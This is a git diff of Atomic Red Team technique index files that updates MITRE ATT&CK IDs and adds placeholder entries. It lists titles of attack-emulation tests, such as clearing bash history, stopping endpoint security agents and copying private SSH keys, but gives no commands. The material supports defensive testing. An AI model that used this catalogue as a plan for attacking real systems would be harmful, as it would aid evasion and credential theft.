- T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -199,6 +200,7 @@
- Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
- Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
+- T1574.012 COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md)
- Atomic Test #1: Change Default File Association [windows]
- T1136.003 Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -275,7 +277,7 @@
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
- [T1547.011 Plist Modification](../../T1547.011/T1547.011.md)
- Atomic Test #1: Plist Modification [macos]
-- T1545.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1547.010 Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.013 PowerShell Profile](../../T1546.013/T1546.013.md)
- Atomic Test #1: Append malicious start-process cmdlet [windows]
@@ -294,6 +296,7 @@
- Atomic Test #5: Suspicious jse file run from startup Folder [windows]
- Atomic Test #6: Suspicious bat file run from startup Folder [windows]
- T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1098.004 SSH Authorized Keys [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md)
- Atomic Test #1: Scheduled Task Startup Script [windows]
- Atomic Test #2: Scheduled task Local [windows]
@@ -318,7 +321,7 @@
- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
- T1547.003 Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1545 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1505.002 Transport Agent](../../T1505.002/T1505.002.md)
- Atomic Test #1: Install MS Exchange Transport Agent Persistence [windows]
- [T1546.005 Trap](../../T1546.005/T1546.005.md)
@@ -412,6 +415,7 @@
- [T1110.003 Password Spraying](../../T1110.003/T1110.003.md)
- Atomic Test #1: Password Spray all Domain Users [windows]
- Atomic Test #2: Password Spray (DomainPasswordSpray) [windows]
+- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
- Atomic Test #1: Private Keys [windows]
- Atomic Test #2: Discover Private SSH Keys [macos, linux]
@@ -455,7 +459,8 @@
- [T1218.003 CMSTP](../../T1218.003/T1218.003.md)
- Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
- Atomic Test #2: CMSTP Executing UAC Bypass [windows]
-- [T1551.003 Clear Command History](../../T1551.003/T1551.003.md)
+- T1574.012 COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1070.003 Clear Command History](../../T1070.003/T1070.003.md)
- Atomic Test #1: Clear Bash history (rm) [linux, macos]
- Atomic Test #2: Clear Bash history (echo) [linux, macos]
- Atomic Test #3: Clear Bash history (cat dev/null) [linux, macos]
@@ -463,11 +468,11 @@
- Atomic Test #5: Clear Bash history (truncate) [linux]
- Atomic Test #6: Clear history of a bunch of shells [linux, macos]
- Atomic Test #7: Clear and Disable Bash History Logging [linux, macos]
-- [T1551.002 Clear Linux or Mac System Logs](../../T1551.002/T1551.002.md)
+- [T1070.002 Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md)
- Atomic Test #1: rm -rf [macos, linux]
- Atomic Test #2: Overwrite Linux Mail Spool [linux]
- Atomic Test #3: Overwrite Linux Log [linux]
-- [T1551.001 Clear Windows Event Logs](../../T1551.001/T1551.001.md)
+- [T1070.001 Clear Windows Event Logs](../../T1070.001/T1070.001.md)
- Atomic Test #1: Clear Logs [windows]
- Atomic Test #2: Delete System Logs Using Clear-EventLogId [windows]
- T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -481,18 +486,22 @@
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1218.002 Control Panel](../../T1218.002/T1218.002.md)
- Atomic Test #1: Control Panel Items [windows]
+- T1578.002 Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1134.002 Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1578.001 Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.001 DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1578.003 Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
- Atomic Test #1: Deobfuscate/Decode Files Or Information [windows]
- Atomic Test #2: Certutil Rename and Decode [windows]
- T1006 Direct Volume Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1562.002 Disable Windows Event Logging](../../T1562.002/T1562.002.md)
- Atomic Test #1: Disable Windows IIS HTTP Logging [windows]
+- T1562.007 Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1562.004 Disable or Modify System Firewall](../../T1562.004/T1562.004.md)
- Atomic Test #1: Disable iptables firewall [linux]
- Atomic Test #2: Disable Microsoft Defender Firewall [windows]
@@ -527,11 +536,12 @@
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.001 Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.011 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1551.004 File Deletion](../../T1551.004/T1551.004.md)
+- [T1070.004 File Deletion](../../T1070.004/T1070.004.md)
- Atomic Test #1: Delete a single file - Linux/macOS [linux, macos]
- Atomic Test #2: Delete an entire folder - Linux/macOS [linux, macos]
- Atomic Test #3: Overwrite and delete a file with shred [linux]
@@ -549,6 +559,7 @@
- [T1562.003 HISTCONTROL](../../T1562.003/T1562.003.md)
- Atomic Test #1: Disable history collection [linux, macos]
- Atomic Test #2: Mac HISTCONTROL [macos, linux]
+- T1564.005 Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1564.001 Hidden Files and Directories](../../T1564.001/T1564.001.md)
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
- Atomic Test #2: Mac Hidden file [macos]
@@ -566,7 +577,7 @@
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1562.006 Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1551 Indicator Removal on Host](../../T1551/T1551.md)
+- [T1070 Indicator Removal on Host](../../T1070/T1070.md)
- Atomic Test #1: Indicator Removal using FSUtil [windows]
- [T1202 Indirect Command Execution](../../T1202/T1202.md)
- Atomic Test #1: Indirect Command Execution - pcalua.exe [windows]
@@ -608,6 +619,7 @@
- T1036 Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1112 Modify Registry](../../T1112/T1112.md)
- Atomic Test #1: Modify Registry of Current User Profile - cmd [windows]
- Atomic Test #2: Modify Registry of Local Machine - cmd [windows]
@@ -627,7 +639,7 @@
- Atomic Test #2: Store file in Alternate Data Stream (ADS) [windows]
- Atomic Test #3: Create ADS command prompt [windows]
- Atomic Test #4: Create ADS PowerShell [windows]
-- [T1551.005 Network Share Connection Removal](../../T1551.005/T1551.005.md)
+- [T1070.005 Network Share Connection Removal](../../T1070.005/T1070.005.md)
- Atomic Test #1: Add Network Share [windows]
- Atomic Test #2: Remove Network Share [windows]
- Atomic Test #3: Remove Network Share PowerShell [windows]
@@ -651,7 +663,8 @@
- T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
-- T1545.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -682,7 +695,7 @@
- Atomic Test #7: Masquerading - windows exe running as different windows exe [windows]
- Atomic Test #8: Malicious process Masquerading as LSM.exe [windows]
- Atomic Test #9: File Extension Masquerading [windows]
-- T1536 Revert Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1578.004 Revert Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1207 Rogue Domain Controller](../../T1207/T1207.md)
- Atomic Test #1: DCShadow - Mimikatz [windows]
@@ -690,6 +703,7 @@
- Atomic Test #1: Loadable Kernel Module based Rootkit [linux]
- Atomic Test #2: Loadable Kernel Module based Rootkit [linux]
- Atomic Test #3: Windows Signed Driver Rootkit Test [windows]
+- T1564.006 Run Virtual Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1218.011 Rundll32](../../T1218.011/T1218.011.md)
- Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject [windows]
- Atomic Test #2: Rundll32 execute VBscript command [windows]
@@ -735,7 +749,7 @@
- T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1551.006 Timestomp](../../T1551.006/T1551.006.md)
+- [T1070.006 Timestomp](../../T1070.006/T1070.006.md)
- Atomic Test #1: Set a file's access timestamp [linux, macos]
- Atomic Test #2: Set a file's modification timestamp [linux, macos]
- Atomic Test #3: Set a file's creation timestamp [linux, macos]
@@ -745,7 +759,7 @@
- Atomic Test #7: Windows - Modify file last access timestamp with PowerShell [windows]
- Atomic Test #8: Windows - Timestomp a File [windows]
- T1134.001 Token Impersonation/Theft [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1545 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1127 Trusted Developer Utilities Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -919,6 +933,7 @@
- [T1518 Software Discovery](../../T1518/T1518.md)
- Atomic Test #1: Find and Display Internet Explorer Browser Version [windows]
- Atomic Test #2: Applications Installed [windows]
+- T1497.001 System Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1082 System Information Discovery](../../T1082/T1082.md)
- Atomic Test #1: System Information Discovery [windows]
- Atomic Test #2: System Information Discovery [macos]
@@ -948,6 +963,9 @@
- [T1124 System Time Discovery](../../T1124/T1124.md)
- Atomic Test #1: System Time Discovery [windows]
- Atomic Test #2: System Time Discovery - PowerShell [windows]
+- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# execution
- [T1059.002 AppleScript](../../T1059.002/T1059.002.md)
@@ -955,9 +973,6 @@
- T1053.001 At (Linux) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.002 At (Windows)](../../T1053.002/T1053.002.md)
- Atomic Test #1: At.exe Scheduled task [windows]
-- [T1059.004 Bash](../../T1059.004/T1059.004.md)
- - Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
- - Atomic Test #2: Command-Line Interface [macos, linux]
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1559.001 Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1175 Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -971,6 +986,7 @@
- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1061 Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1059.007 JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1569.001 Launchctl](../../T1569.001/T1569.001.md)
- Atomic Test #1: Launchctl [macos]
- [T1053.004 Launchd](../../T1053.004/T1053.004.md)
@@ -1013,8 +1029,11 @@
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1153 Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1569 System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1059.004 Unix Shell](../../T1059.004/T1059.004.md)
+ - Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
+ - Atomic Test #2: Command-Line Interface [macos, linux]
- T1204 User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1059.005 VBScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1059.005 Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1059.003 Windows Command Shell](../../T1059.003/T1059.003.md)
- Atomic Test #1: Create and Execute Batch Script [windows]
- [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
@@ -1070,6 +1089,7 @@
- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1043 Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1071.004 DNS](../../T1071.004/T1071.004.md)
- Atomic Test #1: DNS Large Query Volume [windows]
@@ -1120,7 +1140,7 @@
- Atomic Test #1: Testing usage of uncommonly used port with PowerShell [windows]
- Atomic Test #2: Testing usage of uncommonly used port [linux, macos]
- T1102.003 One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1545.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1001.003 Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1572 Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1090 Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -1132,7 +1152,7 @@
- Atomic Test #1: Base64 Encoded data. [macos, linux]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1545 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1071.001 Web Protocols](../../T1071.001/T1071.001.md)
- Atomic Test #1: Malicious User Agents - Powershell [windows]
- Atomic Test #2: Malicious User Agents - CMD [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md
index 41f4ea3c..cdbafddc 100644
--- a/atomics/Indexes/Indexes-Markdown/linux-index.md
+++ b/atomics/Indexes/Indexes-Markdown/linux-index.md
@@ -69,6 +69,7 @@
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1098.002 Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1133 External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1525 Implant Container Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1547.006 Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
@@ -86,15 +87,16 @@
- T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1137.004 Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1545.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1098.004 SSH Authorized Keys [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1505 Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
-- T1545 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1505.002 Transport Agent [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.005 Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap [macos, linux]
@@ -116,12 +118,14 @@
- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1056.001 Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #1: Packet Capture Linux [linux]
- T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1110.002 Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1110.001 Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1110.003 Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
- Atomic Test #2: Discover Private SSH Keys [macos, linux]
- Atomic Test #3: Copy Private SSH Keys with CP [linux]
@@ -140,7 +144,7 @@
- [T1027.001 Binary Padding](../../T1027.001/T1027.001.md)
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux]
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1551.003 Clear Command History](../../T1551.003/T1551.003.md)
+- [T1070.003 Clear Command History](../../T1070.003/T1070.003.md)
- Atomic Test #1: Clear Bash history (rm) [linux, macos]
- Atomic Test #2: Clear Bash history (echo) [linux, macos]
- Atomic Test #3: Clear Bash history (cat dev/null) [linux, macos]
@@ -148,13 +152,18 @@
- Atomic Test #5: Clear Bash history (truncate) [linux]
- Atomic Test #6: Clear history of a bunch of shells [linux, macos]
- Atomic Test #7: Clear and Disable Bash History Logging [linux, macos]
-- [T1551.002 Clear Linux or Mac System Logs](../../T1551.002/T1551.002.md)
+- [T1070.002 Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md)
- Atomic Test #1: rm -rf [macos, linux]
- Atomic Test #2: Overwrite Linux Mail Spool [linux]
- Atomic Test #3: Overwrite Linux Log [linux]
- T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1027.004 Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1578.002 Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1578.001 Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1578.003 Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1140 Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1562.007 Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1562.004 Disable or Modify System Firewall](../../T1562.004/T1562.004.md)
- Atomic Test #1: Disable iptables firewall [linux]
- [T1562.001 Disable or Modify Tools](../../T1562.001/T1562.001.md)
@@ -163,9 +172,10 @@
- Atomic Test #3: Disable SELinux [linux]
- Atomic Test #4: Stop Crowdstrike Falcon on Linux [linux]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1551.004 File Deletion](../../T1551.004/T1551.004.md)
+- [T1070.004 File Deletion](../../T1070.004/T1070.004.md)
- Atomic Test #1: Delete a single file - Linux/macOS [linux, macos]
- Atomic Test #2: Delete an entire folder - Linux/macOS [linux, macos]
- Atomic Test #3: Overwrite and delete a file with shred [linux]
@@ -174,13 +184,15 @@
- [T1562.003 HISTCONTROL](../../T1562.003/T1562.003.md)
- Atomic Test #1: Disable history collection [linux, macos]
- Atomic Test #2: Mac HISTCONTROL [macos, linux]
+- T1564.005 Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1564.001 Hidden Files and Directories](../../T1564.001/T1564.001.md)
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
- T1564 Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1562.006 Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1551 Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1070 Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1553.004 Install Root Certificate](../../T1553.004/T1553.004.md)
- Atomic Test #1: Install root CA on CentOS/RHEL [linux]
- Atomic Test #2: Install root CA on Debian/Ubuntu [linux]
@@ -201,9 +213,12 @@
- T1036.004 Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036 Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
- Atomic Test #1: Decode base64 Data into Script [macos, linux]
-- T1545.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055 Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -211,11 +226,12 @@
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1036.003 Rename System Utilities](../../T1036.003/T1036.003.md)
- Atomic Test #2: Masquerading as Linux crond process. [linux]
-- T1536 Revert Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1578.004 Revert Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1014 Rootkit](../../T1014/T1014.md)
- Atomic Test #1: Loadable Kernel Module based Rootkit [linux]
- Atomic Test #2: Loadable Kernel Module based Rootkit [linux]
+- T1564.006 Run Virtual Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1548.001 Setuid and Setgid](../../T1548.001/T1548.001.md)
- Atomic Test #1: Make and modify binary from C source [macos, linux]
@@ -230,12 +246,12 @@
- Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
- T1497.001 System Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1551.006 Timestomp](../../T1551.006/T1551.006.md)
+- [T1070.006 Timestomp](../../T1070.006/T1070.006.md)
- Atomic Test #1: Set a file's access timestamp [linux, macos]
- Atomic Test #2: Set a file's modification timestamp [linux, macos]
- Atomic Test #3: Set a file's creation timestamp [linux, macos]
- Atomic Test #4: Modify file timestamps using reference file [linux, macos]
-- T1545 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -324,6 +340,7 @@
- [T1518.001 Security Software Discovery](../../T1518.001/T1518.001.md)
- Atomic Test #3: Security Software Discovery - ps [linux, macos]
- T1518 Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1497.001 System Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1082 System Information Discovery](../../T1082/T1082.md)
- Atomic Test #3: List OS Information [linux, macos]
- Atomic Test #4: Linux VM Check via Hardware [linux]
@@ -335,6 +352,9 @@
- Atomic Test #3: System Network Connections Discovery Linux & MacOS [linux, macos]
- [T1033 System Owner/User Discovery](../../T1033/T1033.md)
- Atomic Test #2: System Owner/User Discovery [linux, macos]
+- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# lateral-movement
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -354,6 +374,7 @@
- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
